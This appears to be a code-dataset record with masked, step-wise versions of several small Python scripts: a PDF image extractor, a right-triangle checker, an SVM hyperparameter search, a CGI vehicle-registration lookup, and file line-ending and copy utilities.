return new_file, filename
<|reserved_special_token_0|>
def pdf_2_images(url, dest_path):
new_file, filename = download_pdf_to_temp(url)
save_pdf_image(filename, dest_path)
os.close(new_file)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def download_pdf(url, folder, name):
r = requests.get(url, allow_redirects=True)
file_path = join(folder, name + '.pdf')
open(file_path, 'wb').write(r.content)
return file_path
def download_pdf_to_temp(url):
new_file, filename = tempfile.mkstemp()
r = requests.get(url, allow_redirects=True)
os.write(new_file, r.content)
return new_file, filename
def save_pdf_image(file_path, dest_path):
Path(dest_path).mkdir(parents=True, exist_ok=True)
doc = fitz.open(file_path)
i = 1
images_name = list()
xrefs = sorted([xref[0] for xref in doc.getPageImageList(0) if not xref
[0] in [10, 25, 26]])
maximum_digits = len(str(len(xrefs) * 3))
for xref in tqdm(xrefs):
pix = fitz.Pixmap(doc, xref)
index = f'{i:0{maximum_digits}}'
img_name = 'image--{}.jpg'.format(index)
img_path = join(dest_path, img_name)
if not exists(img_path):
if pix.n >= 5:
pix = fitz.Pixmap(fitz.csRGB, pix)
pix.writeImage(img_path)
images_name.append(xref)
i += 3
def pdf_2_images(url, dest_path):
new_file, filename = download_pdf_to_temp(url)
save_pdf_image(filename, dest_path)
os.close(new_file)
<|reserved_special_token_1|>
import requests
from os.path import join, exists
import os
import fitz
from tqdm import tqdm
from pathlib import Path
import tempfile
def download_pdf(url, folder, name):
r = requests.get(url, allow_redirects=True)
file_path = join(folder, name + '.pdf')
open(file_path, 'wb').write(r.content)
return file_path
def download_pdf_to_temp(url):
new_file, filename = tempfile.mkstemp()
r = requests.get(url, allow_redirects=True)
os.write(new_file, r.content)
return new_file, filename
def save_pdf_image(file_path, dest_path):
Path(dest_path).mkdir(parents=True, exist_ok=True)
doc = fitz.open(file_path)
i = 1
images_name = list()
xrefs = sorted([xref[0] for xref in doc.getPageImageList(0) if not xref
[0] in [10, 25, 26]])
maximum_digits = len(str(len(xrefs) * 3))
for xref in tqdm(xrefs):
pix = fitz.Pixmap(doc, xref)
index = f'{i:0{maximum_digits}}'
img_name = 'image--{}.jpg'.format(index)
img_path = join(dest_path, img_name)
if not exists(img_path):
if pix.n >= 5:
pix = fitz.Pixmap(fitz.csRGB, pix)
pix.writeImage(img_path)
images_name.append(xref)
i += 3
def pdf_2_images(url, dest_path):
new_file, filename = download_pdf_to_temp(url)
save_pdf_image(filename, dest_path)
os.close(new_file)
<|reserved_special_token_1|>
import requests
from os.path import join, exists
import os
import fitz
from tqdm import tqdm
from pathlib import Path
import tempfile
def download_pdf(url, folder, name):
r = requests.get(url, allow_redirects=True)
file_path = join(folder, name + ".pdf")
open(file_path, 'wb').write(r.content)
return file_path
def download_pdf_to_temp(url):
new_file, filename = tempfile.mkstemp()
r = requests.get(url, allow_redirects=True)
os.write(new_file, r.content)
return new_file, filename
def save_pdf_image(file_path, dest_path):
Path(dest_path).mkdir(parents=True, exist_ok=True)
doc = fitz.open(file_path)
i = 1
images_name = list()
xrefs = sorted([xref[0] for xref in doc.getPageImageList(0) if not(xref[0] in [10, 25, 26])])
maximum_digits = len(str(len(xrefs)*3))
for xref in tqdm(xrefs):
pix = fitz.Pixmap(doc, xref)
index = f'{i:0{maximum_digits}}'
img_name = "image--{}.jpg".format(index)
img_path = join(dest_path, img_name)
if not(exists(img_path)):
if pix.n >= 5:
pix = fitz.Pixmap(fitz.csRGB, pix)
pix.writeImage(img_path)
images_name.append(xref)
i += 3
def pdf_2_images(url, dest_path):
new_file, filename = download_pdf_to_temp(url)
save_pdf_image(filename, dest_path)
os.close(new_file)
|
flexible
|
{
"blob_id": "c6113088f45951bc4c787760b6ca0138265fb83f",
"index": 9966,
"step-1": "<mask token>\n\n\ndef download_pdf(url, folder, name):\n r = requests.get(url, allow_redirects=True)\n file_path = join(folder, name + '.pdf')\n open(file_path, 'wb').write(r.content)\n return file_path\n\n\n<mask token>\n\n\ndef pdf_2_images(url, dest_path):\n new_file, filename = download_pdf_to_temp(url)\n save_pdf_image(filename, dest_path)\n os.close(new_file)\n",
"step-2": "<mask token>\n\n\ndef download_pdf(url, folder, name):\n r = requests.get(url, allow_redirects=True)\n file_path = join(folder, name + '.pdf')\n open(file_path, 'wb').write(r.content)\n return file_path\n\n\ndef download_pdf_to_temp(url):\n new_file, filename = tempfile.mkstemp()\n r = requests.get(url, allow_redirects=True)\n os.write(new_file, r.content)\n return new_file, filename\n\n\n<mask token>\n\n\ndef pdf_2_images(url, dest_path):\n new_file, filename = download_pdf_to_temp(url)\n save_pdf_image(filename, dest_path)\n os.close(new_file)\n",
"step-3": "<mask token>\n\n\ndef download_pdf(url, folder, name):\n r = requests.get(url, allow_redirects=True)\n file_path = join(folder, name + '.pdf')\n open(file_path, 'wb').write(r.content)\n return file_path\n\n\ndef download_pdf_to_temp(url):\n new_file, filename = tempfile.mkstemp()\n r = requests.get(url, allow_redirects=True)\n os.write(new_file, r.content)\n return new_file, filename\n\n\ndef save_pdf_image(file_path, dest_path):\n Path(dest_path).mkdir(parents=True, exist_ok=True)\n doc = fitz.open(file_path)\n i = 1\n images_name = list()\n xrefs = sorted([xref[0] for xref in doc.getPageImageList(0) if not xref\n [0] in [10, 25, 26]])\n maximum_digits = len(str(len(xrefs) * 3))\n for xref in tqdm(xrefs):\n pix = fitz.Pixmap(doc, xref)\n index = f'{i:0{maximum_digits}}'\n img_name = 'image--{}.jpg'.format(index)\n img_path = join(dest_path, img_name)\n if not exists(img_path):\n if pix.n >= 5:\n pix = fitz.Pixmap(fitz.csRGB, pix)\n pix.writeImage(img_path)\n images_name.append(xref)\n i += 3\n\n\ndef pdf_2_images(url, dest_path):\n new_file, filename = download_pdf_to_temp(url)\n save_pdf_image(filename, dest_path)\n os.close(new_file)\n",
"step-4": "import requests\nfrom os.path import join, exists\nimport os\nimport fitz\nfrom tqdm import tqdm\nfrom pathlib import Path\nimport tempfile\n\n\ndef download_pdf(url, folder, name):\n r = requests.get(url, allow_redirects=True)\n file_path = join(folder, name + '.pdf')\n open(file_path, 'wb').write(r.content)\n return file_path\n\n\ndef download_pdf_to_temp(url):\n new_file, filename = tempfile.mkstemp()\n r = requests.get(url, allow_redirects=True)\n os.write(new_file, r.content)\n return new_file, filename\n\n\ndef save_pdf_image(file_path, dest_path):\n Path(dest_path).mkdir(parents=True, exist_ok=True)\n doc = fitz.open(file_path)\n i = 1\n images_name = list()\n xrefs = sorted([xref[0] for xref in doc.getPageImageList(0) if not xref\n [0] in [10, 25, 26]])\n maximum_digits = len(str(len(xrefs) * 3))\n for xref in tqdm(xrefs):\n pix = fitz.Pixmap(doc, xref)\n index = f'{i:0{maximum_digits}}'\n img_name = 'image--{}.jpg'.format(index)\n img_path = join(dest_path, img_name)\n if not exists(img_path):\n if pix.n >= 5:\n pix = fitz.Pixmap(fitz.csRGB, pix)\n pix.writeImage(img_path)\n images_name.append(xref)\n i += 3\n\n\ndef pdf_2_images(url, dest_path):\n new_file, filename = download_pdf_to_temp(url)\n save_pdf_image(filename, dest_path)\n os.close(new_file)\n",
"step-5": "import requests\nfrom os.path import join, exists\nimport os\nimport fitz\nfrom tqdm import tqdm\nfrom pathlib import Path\nimport tempfile\n\n\ndef download_pdf(url, folder, name):\n r = requests.get(url, allow_redirects=True)\n file_path = join(folder, name + \".pdf\")\n open(file_path, 'wb').write(r.content)\n return file_path\n\n\ndef download_pdf_to_temp(url):\n new_file, filename = tempfile.mkstemp()\n r = requests.get(url, allow_redirects=True)\n os.write(new_file, r.content)\n return new_file, filename\n\n\ndef save_pdf_image(file_path, dest_path):\n Path(dest_path).mkdir(parents=True, exist_ok=True)\n doc = fitz.open(file_path)\n i = 1\n images_name = list()\n xrefs = sorted([xref[0] for xref in doc.getPageImageList(0) if not(xref[0] in [10, 25, 26])])\n maximum_digits = len(str(len(xrefs)*3))\n for xref in tqdm(xrefs):\n pix = fitz.Pixmap(doc, xref)\n index = f'{i:0{maximum_digits}}'\n img_name = \"image--{}.jpg\".format(index)\n img_path = join(dest_path, img_name)\n if not(exists(img_path)):\n if pix.n >= 5:\n pix = fitz.Pixmap(fitz.csRGB, pix)\n pix.writeImage(img_path)\n images_name.append(xref)\n i += 3\n\n\ndef pdf_2_images(url, dest_path):\n new_file, filename = download_pdf_to_temp(url)\n save_pdf_image(filename, dest_path)\n os.close(new_file)",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
n = int(input())
s = ""
for i in range(n):
l = list(map(lambda x:x*x,map(int, input().split())))
l.sort()
if l[0] + l[1] == l[2]:
s += "YES\n"
else:
s += "NO\n"
print(s,end="")
|
normal
|
{
"blob_id": "f8b473451a15e42319b60f44a527d715c0032614",
"index": 3411,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor i in range(n):\n l = list(map(lambda x: x * x, map(int, input().split())))\n l.sort()\n if l[0] + l[1] == l[2]:\n s += 'YES\\n'\n else:\n s += 'NO\\n'\nprint(s, end='')\n",
"step-3": "n = int(input())\ns = ''\nfor i in range(n):\n l = list(map(lambda x: x * x, map(int, input().split())))\n l.sort()\n if l[0] + l[1] == l[2]:\n s += 'YES\\n'\n else:\n s += 'NO\\n'\nprint(s, end='')\n",
"step-4": "n = int(input())\ns = \"\"\nfor i in range(n):\n l = list(map(lambda x:x*x,map(int, input().split())))\n l.sort()\n if l[0] + l[1] == l[2]:\n s += \"YES\\n\"\n else:\n s += \"NO\\n\"\n\nprint(s,end=\"\")",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import sys
from sklearn.svm import SVC
from sklearn.model_selection import KFold,cross_validate,GridSearchCV
from data_prepr import data_preprocessing
import numpy as np
def main():
#if dataset is not provided on call terminate
if len(sys.argv)<2:
print("usage: python svm_parameter_tuning.py <input_file> ")
sys.exit()
#pass dataset and get the matrix containing the data vectors and data targets
ret_value=data_preprocessing(sys.argv[1])
data_matrix=ret_value[0]
category_labels=ret_value[1]
#create k_fold iterator to calculate metrics
k_fold = KFold(n_splits=10)
#perform grid search to determine parameter tuning
c_range = [np.power(2.0,i) for i in range(-5, 10)]
gamma_range = [np.power(2.0,i) for i in range(-10, -5)]
param_grid = [{'kernel': ['rbf'], 'gamma': gamma_range,'C':c_range},{'kernel': ['linear'], 'C': c_range}]
clf = GridSearchCV(SVC(),param_grid,cv=k_fold,scoring='accuracy',n_jobs=-1)
clf.fit(data_matrix,category_labels)
#print chosen hyperparameters
print "Best accuracy achieved:"+ str(clf.best_score_) + " with below settings."
for key,value in clf.best_params_.iteritems():
print key + ":" + str(value)
#save best hyperparameter values on a dictionary in file hyperparameter_values.py
output=open('./hyperparameter_values.py','w')
output.write('HYPERPARAMETER_VALUES={')
first=True
for key,value in clf.best_params_.iteritems():
if first==True:
output.write("\'"+key+"\':")
first=False
else:
output.write(",\'"+key+"\':")
if isinstance(value,str):
output.write("\'"+value+"\'")
else:
output.write(str(value))
output.write('}')
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "c5842b17b2587149cd13448593a6ed31b091ba77",
"index": 4971,
"step-1": "import sys\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import KFold,cross_validate,GridSearchCV\nfrom data_prepr import data_preprocessing\nimport numpy as np\n\n\ndef main():\n\t#if dataset is not provided on call terminate\n\tif len(sys.argv)<2:\n\t\tprint(\"usage: python svm_parameter_tuning.py <input_file> \")\n\t\tsys.exit()\n\n\t#pass dataset and get the matrix containing the data vectors and data targets\n\tret_value=data_preprocessing(sys.argv[1])\n\tdata_matrix=ret_value[0]\n\tcategory_labels=ret_value[1]\n\n\t#create k_fold iterator to calculate metrics\n\tk_fold = KFold(n_splits=10)\n\n\t#perform grid search to determine parameter tuning\n\tc_range = [np.power(2.0,i) for i in range(-5, 10)]\n\tgamma_range = [np.power(2.0,i) for i in range(-10, -5)]\n\tparam_grid = [{'kernel': ['rbf'], 'gamma': gamma_range,'C':c_range},{'kernel': ['linear'], 'C': c_range}]\n\tclf = GridSearchCV(SVC(),param_grid,cv=k_fold,scoring='accuracy',n_jobs=-1)\n\tclf.fit(data_matrix,category_labels)\n\n\t#print chosen hyperparameters\n\tprint \"Best accuracy achieved:\"+ str(clf.best_score_) + \" with below settings.\"\n\tfor key,value in clf.best_params_.iteritems():\n\t\tprint key + \":\" + str(value)\n\t#save best hyperparameter values on a dictionary in file hyperparameter_values.py\n\toutput=open('./hyperparameter_values.py','w')\n\toutput.write('HYPERPARAMETER_VALUES={')\n\tfirst=True\n\tfor key,value in clf.best_params_.iteritems():\n\t\tif first==True:\n\t\t\toutput.write(\"\\'\"+key+\"\\':\")\n\t\t\tfirst=False\n\t\telse:\n\t\t\toutput.write(\",\\'\"+key+\"\\':\")\n\n\t\tif isinstance(value,str):\n\t\t\toutput.write(\"\\'\"+value+\"\\'\")\n\t\telse:\n\t\t\toutput.write(str(value))\n\toutput.write('}')\n\n\n\nif __name__ == '__main__':\n\tmain()",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
#! /usr/bin/python3
print("content-type: text/html")
print()
import cgi
import subprocess as sp
import requests
import xmltodict
import json
db = cgi.FieldStorage()
ch=db.getvalue("ch")
url =("http://www.regcheck.org.uk/api/reg.asmx/CheckIndia?RegistrationNumber={}&username=<username>" .format(ch))
url=url.replace(" ","%20")
r = requests.get(url)
n = xmltodict.parse(r.content)
k = json.dumps(n)
df = json.loads(k)
l=df["Vehicle"]["vehicleJson"]
p=json.loads(l)
output="Your car's details are:\n"+"Owner name: "+str(p['Owner'])+"\n"+"Car Company: "+str(p['CarMake']['CurrentTextValue'])+"\n"+"Car Model: "+str(p['CarModel']['CurrentTextValue'])+"\n"+"Fuel Type: "+str(p['FuelType']['CurrentTextValue'])+"\n"+"Registration Year: "+str(p['RegistrationYear'])+"\n"+"Insurance: "+str(p['Insurance'])+"\n"+"Vehicle ID: "+str(p['VechileIdentificationNumber'])+"\n"+"Engine No.: "+str(p['EngineNumber'])+"\n"+"Location RTO: "+str(p['Location'])
print(output)
|
normal
|
{
"blob_id": "87a62f76027e0653f6966f76a42def2ce2a26ba3",
"index": 5893,
"step-1": "<mask token>\n",
"step-2": "print('content-type: text/html')\nprint()\n<mask token>\nprint(output)\n",
"step-3": "print('content-type: text/html')\nprint()\n<mask token>\ndb = cgi.FieldStorage()\nch = db.getvalue('ch')\nurl = (\n 'http://www.regcheck.org.uk/api/reg.asmx/CheckIndia?RegistrationNumber={}&username=<username>'\n .format(ch))\nurl = url.replace(' ', '%20')\nr = requests.get(url)\nn = xmltodict.parse(r.content)\nk = json.dumps(n)\ndf = json.loads(k)\nl = df['Vehicle']['vehicleJson']\np = json.loads(l)\noutput = \"Your car's details are:\\n\" + 'Owner name: ' + str(p['Owner']\n ) + '\\n' + 'Car Company: ' + str(p['CarMake']['CurrentTextValue']\n ) + '\\n' + 'Car Model: ' + str(p['CarModel']['CurrentTextValue']\n ) + '\\n' + 'Fuel Type: ' + str(p['FuelType']['CurrentTextValue']\n ) + '\\n' + 'Registration Year: ' + str(p['RegistrationYear']\n ) + '\\n' + 'Insurance: ' + str(p['Insurance']\n ) + '\\n' + 'Vehicle ID: ' + str(p['VechileIdentificationNumber']\n ) + '\\n' + 'Engine No.: ' + str(p['EngineNumber']\n ) + '\\n' + 'Location RTO: ' + str(p['Location'])\nprint(output)\n",
"step-4": "print('content-type: text/html')\nprint()\nimport cgi\nimport subprocess as sp\nimport requests\nimport xmltodict\nimport json\ndb = cgi.FieldStorage()\nch = db.getvalue('ch')\nurl = (\n 'http://www.regcheck.org.uk/api/reg.asmx/CheckIndia?RegistrationNumber={}&username=<username>'\n .format(ch))\nurl = url.replace(' ', '%20')\nr = requests.get(url)\nn = xmltodict.parse(r.content)\nk = json.dumps(n)\ndf = json.loads(k)\nl = df['Vehicle']['vehicleJson']\np = json.loads(l)\noutput = \"Your car's details are:\\n\" + 'Owner name: ' + str(p['Owner']\n ) + '\\n' + 'Car Company: ' + str(p['CarMake']['CurrentTextValue']\n ) + '\\n' + 'Car Model: ' + str(p['CarModel']['CurrentTextValue']\n ) + '\\n' + 'Fuel Type: ' + str(p['FuelType']['CurrentTextValue']\n ) + '\\n' + 'Registration Year: ' + str(p['RegistrationYear']\n ) + '\\n' + 'Insurance: ' + str(p['Insurance']\n ) + '\\n' + 'Vehicle ID: ' + str(p['VechileIdentificationNumber']\n ) + '\\n' + 'Engine No.: ' + str(p['EngineNumber']\n ) + '\\n' + 'Location RTO: ' + str(p['Location'])\nprint(output)\n",
"step-5": "#! /usr/bin/python3\r\n\r\nprint(\"content-type: text/html\")\r\nprint()\r\n\r\n\r\nimport cgi\r\nimport subprocess as sp\r\nimport requests\r\nimport xmltodict\r\nimport json\r\n\r\ndb = cgi.FieldStorage()\r\nch=db.getvalue(\"ch\")\r\nurl =(\"http://www.regcheck.org.uk/api/reg.asmx/CheckIndia?RegistrationNumber={}&username=<username>\" .format(ch))\r\nurl=url.replace(\" \",\"%20\")\r\nr = requests.get(url)\r\nn = xmltodict.parse(r.content)\r\nk = json.dumps(n)\r\ndf = json.loads(k)\r\nl=df[\"Vehicle\"][\"vehicleJson\"]\r\np=json.loads(l)\r\noutput=\"Your car's details are:\\n\"+\"Owner name: \"+str(p['Owner'])+\"\\n\"+\"Car Company: \"+str(p['CarMake']['CurrentTextValue'])+\"\\n\"+\"Car Model: \"+str(p['CarModel']['CurrentTextValue'])+\"\\n\"+\"Fuel Type: \"+str(p['FuelType']['CurrentTextValue'])+\"\\n\"+\"Registration Year: \"+str(p['RegistrationYear'])+\"\\n\"+\"Insurance: \"+str(p['Insurance'])+\"\\n\"+\"Vehicle ID: \"+str(p['VechileIdentificationNumber'])+\"\\n\"+\"Engine No.: \"+str(p['EngineNumber'])+\"\\n\"+\"Location RTO: \"+str(p['Location'])\r\nprint(output)\r\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
def line_endings(fname):
"""Return all line endings in the file.
"""
_endings = {line[-2:] for line in open(fname, 'rb').readlines()}
res = set()
for e in _endings:
if e.endswith(b'\r'):
res.add(b'\r')
elif e.endswith(b'\r\n'):
res.add(b'\r\n')
elif e.endswith(b'\n'):
res.add(b'\n')
return res
<|reserved_special_token_0|>
def fix_line_endings(fname, eol=b'\n'):
"""Change all line endings to ``eol``.
"""
lines = [chomp(line) for line in open(fname, 'rb').readlines()]
with open(fname, 'wb') as fp:
for line in lines:
fp.write(line + eol)
<|reserved_special_token_0|>
def concat(ctx, dest, *sources, **kw):
force = kw.pop('force', False)
placement = Path(dest).dirname()
placement.makedirs()
with open(dest, 'w') as out:
print('Opened:', dest, 'for writing.')
for s in sources:
with open(s, 'r') as inp:
print(' appending:', s)
out.writelines(inp.readlines())
out.write('\n')
fix_line_endings(dest)
return dest
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def line_endings(fname):
"""Return all line endings in the file.
"""
_endings = {line[-2:] for line in open(fname, 'rb').readlines()}
res = set()
for e in _endings:
if e.endswith(b'\r'):
res.add(b'\r')
elif e.endswith(b'\r\n'):
res.add(b'\r\n')
elif e.endswith(b'\n'):
res.add(b'\n')
return res
def chomp(s):
"""Remove line terminator if it exists.
"""
if s[-2:] == b'\r\n':
return s[:-2]
if s[-1:] == b'\r' or s[-1:] == b'\n':
return s[:-1]
return s
def fix_line_endings(fname, eol=b'\n'):
"""Change all line endings to ``eol``.
"""
lines = [chomp(line) for line in open(fname, 'rb').readlines()]
with open(fname, 'wb') as fp:
for line in lines:
fp.write(line + eol)
<|reserved_special_token_0|>
def concat(ctx, dest, *sources, **kw):
force = kw.pop('force', False)
placement = Path(dest).dirname()
placement.makedirs()
with open(dest, 'w') as out:
print('Opened:', dest, 'for writing.')
for s in sources:
with open(s, 'r') as inp:
print(' appending:', s)
out.writelines(inp.readlines())
out.write('\n')
fix_line_endings(dest)
return dest
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def line_endings(fname):
"""Return all line endings in the file.
"""
_endings = {line[-2:] for line in open(fname, 'rb').readlines()}
res = set()
for e in _endings:
if e.endswith(b'\r'):
res.add(b'\r')
elif e.endswith(b'\r\n'):
res.add(b'\r\n')
elif e.endswith(b'\n'):
res.add(b'\n')
return res
def chomp(s):
"""Remove line terminator if it exists.
"""
if s[-2:] == b'\r\n':
return s[:-2]
if s[-1:] == b'\r' or s[-1:] == b'\n':
return s[:-1]
return s
def fix_line_endings(fname, eol=b'\n'):
"""Change all line endings to ``eol``.
"""
lines = [chomp(line) for line in open(fname, 'rb').readlines()]
with open(fname, 'wb') as fp:
for line in lines:
fp.write(line + eol)
def copy(ctx, source, dest, force=False):
"""Copy ``source`` to ``dest``, which can be a file or directory.
"""
if source == dest:
return dest
source = os.path.normcase(os.path.normpath(str(source)))
dest = os.path.normcase(os.path.normpath(str(dest)))
flags = ''
if sys.platform == 'win32':
if force:
flags += ' /Y'
ctx.run('copy {flags} {source} {dest}'.format(**locals()))
else:
if force:
flags += ' --force'
ctx.run('cp {flags} {source} {dest}'.format(**locals()))
return dest
def concat(ctx, dest, *sources, **kw):
force = kw.pop('force', False)
placement = Path(dest).dirname()
placement.makedirs()
with open(dest, 'w') as out:
print('Opened:', dest, 'for writing.')
for s in sources:
with open(s, 'r') as inp:
print(' appending:', s)
out.writelines(inp.readlines())
out.write('\n')
fix_line_endings(dest)
return dest
<|reserved_special_token_1|>
from __future__ import print_function
import os
import sys
from dkfileutils.path import Path
def line_endings(fname):
"""Return all line endings in the file.
"""
_endings = {line[-2:] for line in open(fname, 'rb').readlines()}
res = set()
for e in _endings:
if e.endswith(b'\r'):
res.add(b'\r')
elif e.endswith(b'\r\n'):
res.add(b'\r\n')
elif e.endswith(b'\n'):
res.add(b'\n')
return res
def chomp(s):
"""Remove line terminator if it exists.
"""
if s[-2:] == b'\r\n':
return s[:-2]
if s[-1:] == b'\r' or s[-1:] == b'\n':
return s[:-1]
return s
def fix_line_endings(fname, eol=b'\n'):
"""Change all line endings to ``eol``.
"""
lines = [chomp(line) for line in open(fname, 'rb').readlines()]
with open(fname, 'wb') as fp:
for line in lines:
fp.write(line + eol)
def copy(ctx, source, dest, force=False):
"""Copy ``source`` to ``dest``, which can be a file or directory.
"""
if source == dest:
return dest
source = os.path.normcase(os.path.normpath(str(source)))
dest = os.path.normcase(os.path.normpath(str(dest)))
flags = ''
if sys.platform == 'win32':
if force:
flags += ' /Y'
ctx.run('copy {flags} {source} {dest}'.format(**locals()))
else:
if force:
flags += ' --force'
ctx.run('cp {flags} {source} {dest}'.format(**locals()))
return dest
def concat(ctx, dest, *sources, **kw):
force = kw.pop('force', False)
placement = Path(dest).dirname()
placement.makedirs()
with open(dest, 'w') as out:
print('Opened:', dest, 'for writing.')
for s in sources:
with open(s, 'r') as inp:
print(' appending:', s)
out.writelines(inp.readlines())
out.write('\n')
fix_line_endings(dest)
return dest
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
from __future__ import print_function
import os
import sys
from dkfileutils.path import Path
def line_endings(fname):
"""Return all line endings in the file.
"""
_endings = {line[-2:] for line in open(fname, 'rb').readlines()}
res = set()
for e in _endings:
if e.endswith(b'\r'):
res.add(b'\r')
elif e.endswith(b'\r\n'):
res.add(b'\r\n')
elif e.endswith(b'\n'):
res.add(b'\n')
return res
def chomp(s):
"""Remove line terminator if it exists.
"""
if s[-2:] == b'\r\n':
return s[:-2]
if s[-1:] == b'\r' or s[-1:] == b'\n':
return s[:-1]
return s
def fix_line_endings(fname, eol=b'\n'):
"""Change all line endings to ``eol``.
"""
lines = [chomp(line) for line in open(fname, 'rb').readlines()]
with open(fname, 'wb') as fp:
for line in lines:
fp.write(line + eol)
def copy(ctx, source, dest, force=False):
"""Copy ``source`` to ``dest``, which can be a file or directory.
"""
# print "COPY:", locals()
# print "COPY:", ctx.force, ctx.verbose
if source == dest:
return dest
source = os.path.normcase(os.path.normpath(str(source)))
dest = os.path.normcase(os.path.normpath(str(dest)))
flags = ""
if sys.platform == 'win32':
if force:
flags += " /Y"
# print 'copy {flags} {source} {dest}'.format(**locals())
ctx.run('copy {flags} {source} {dest}'.format(**locals()))
else: # pragma: nocover
if force:
flags += " --force"
ctx.run('cp {flags} {source} {dest}'.format(**locals()))
return dest
def concat(ctx, dest, *sources, **kw):
force = kw.pop('force', False) # noqa
placement = Path(dest).dirname()
placement.makedirs()
with open(dest, 'w') as out:
print("Opened:", dest, "for writing.")
for s in sources:
with open(s, 'r') as inp:
print(" appending:", s)
out.writelines(inp.readlines())
out.write('\n')
# flags = ""
# if sys.platform == 'win32':
# if force:
# flags += " /Y"
# source = '+'.join(sources)
# source = source.replace('/', '\\')
# ctx.run('copy {flags} {source} {dest}'.format(**locals()))
# else: # pragma: nocover
# if force:
# pass
# # flags += " --force"
# source = ' '.join(sources)
# # print 'cat {flags} {source} > {dest}'.format(**locals())
# ctx.run('cat {flags} {source} > {dest}'.format(**locals()))
fix_line_endings(dest)
# if len(line_endings(dest)) > 1:
# fix_line_endings(dest)
return dest
|
flexible
|
{
"blob_id": "be279fe44b0d52c9d473e08d8b9c28d5b6386b45",
"index": 5184,
"step-1": "<mask token>\n\n\ndef line_endings(fname):\n \"\"\"Return all line endings in the file.\n \"\"\"\n _endings = {line[-2:] for line in open(fname, 'rb').readlines()}\n res = set()\n for e in _endings:\n if e.endswith(b'\\r'):\n res.add(b'\\r')\n elif e.endswith(b'\\r\\n'):\n res.add(b'\\r\\n')\n elif e.endswith(b'\\n'):\n res.add(b'\\n')\n return res\n\n\n<mask token>\n\n\ndef fix_line_endings(fname, eol=b'\\n'):\n \"\"\"Change all line endings to ``eol``.\n \"\"\"\n lines = [chomp(line) for line in open(fname, 'rb').readlines()]\n with open(fname, 'wb') as fp:\n for line in lines:\n fp.write(line + eol)\n\n\n<mask token>\n\n\ndef concat(ctx, dest, *sources, **kw):\n force = kw.pop('force', False)\n placement = Path(dest).dirname()\n placement.makedirs()\n with open(dest, 'w') as out:\n print('Opened:', dest, 'for writing.')\n for s in sources:\n with open(s, 'r') as inp:\n print(' appending:', s)\n out.writelines(inp.readlines())\n out.write('\\n')\n fix_line_endings(dest)\n return dest\n",
"step-2": "<mask token>\n\n\ndef line_endings(fname):\n \"\"\"Return all line endings in the file.\n \"\"\"\n _endings = {line[-2:] for line in open(fname, 'rb').readlines()}\n res = set()\n for e in _endings:\n if e.endswith(b'\\r'):\n res.add(b'\\r')\n elif e.endswith(b'\\r\\n'):\n res.add(b'\\r\\n')\n elif e.endswith(b'\\n'):\n res.add(b'\\n')\n return res\n\n\ndef chomp(s):\n \"\"\"Remove line terminator if it exists.\n \"\"\"\n if s[-2:] == b'\\r\\n':\n return s[:-2]\n if s[-1:] == b'\\r' or s[-1:] == b'\\n':\n return s[:-1]\n return s\n\n\ndef fix_line_endings(fname, eol=b'\\n'):\n \"\"\"Change all line endings to ``eol``.\n \"\"\"\n lines = [chomp(line) for line in open(fname, 'rb').readlines()]\n with open(fname, 'wb') as fp:\n for line in lines:\n fp.write(line + eol)\n\n\n<mask token>\n\n\ndef concat(ctx, dest, *sources, **kw):\n force = kw.pop('force', False)\n placement = Path(dest).dirname()\n placement.makedirs()\n with open(dest, 'w') as out:\n print('Opened:', dest, 'for writing.')\n for s in sources:\n with open(s, 'r') as inp:\n print(' appending:', s)\n out.writelines(inp.readlines())\n out.write('\\n')\n fix_line_endings(dest)\n return dest\n",
"step-3": "<mask token>\n\n\ndef line_endings(fname):\n \"\"\"Return all line endings in the file.\n \"\"\"\n _endings = {line[-2:] for line in open(fname, 'rb').readlines()}\n res = set()\n for e in _endings:\n if e.endswith(b'\\r'):\n res.add(b'\\r')\n elif e.endswith(b'\\r\\n'):\n res.add(b'\\r\\n')\n elif e.endswith(b'\\n'):\n res.add(b'\\n')\n return res\n\n\ndef chomp(s):\n \"\"\"Remove line terminator if it exists.\n \"\"\"\n if s[-2:] == b'\\r\\n':\n return s[:-2]\n if s[-1:] == b'\\r' or s[-1:] == b'\\n':\n return s[:-1]\n return s\n\n\ndef fix_line_endings(fname, eol=b'\\n'):\n \"\"\"Change all line endings to ``eol``.\n \"\"\"\n lines = [chomp(line) for line in open(fname, 'rb').readlines()]\n with open(fname, 'wb') as fp:\n for line in lines:\n fp.write(line + eol)\n\n\ndef copy(ctx, source, dest, force=False):\n \"\"\"Copy ``source`` to ``dest``, which can be a file or directory.\n \"\"\"\n if source == dest:\n return dest\n source = os.path.normcase(os.path.normpath(str(source)))\n dest = os.path.normcase(os.path.normpath(str(dest)))\n flags = ''\n if sys.platform == 'win32':\n if force:\n flags += ' /Y'\n ctx.run('copy {flags} {source} {dest}'.format(**locals()))\n else:\n if force:\n flags += ' --force'\n ctx.run('cp {flags} {source} {dest}'.format(**locals()))\n return dest\n\n\ndef concat(ctx, dest, *sources, **kw):\n force = kw.pop('force', False)\n placement = Path(dest).dirname()\n placement.makedirs()\n with open(dest, 'w') as out:\n print('Opened:', dest, 'for writing.')\n for s in sources:\n with open(s, 'r') as inp:\n print(' appending:', s)\n out.writelines(inp.readlines())\n out.write('\\n')\n fix_line_endings(dest)\n return dest\n",
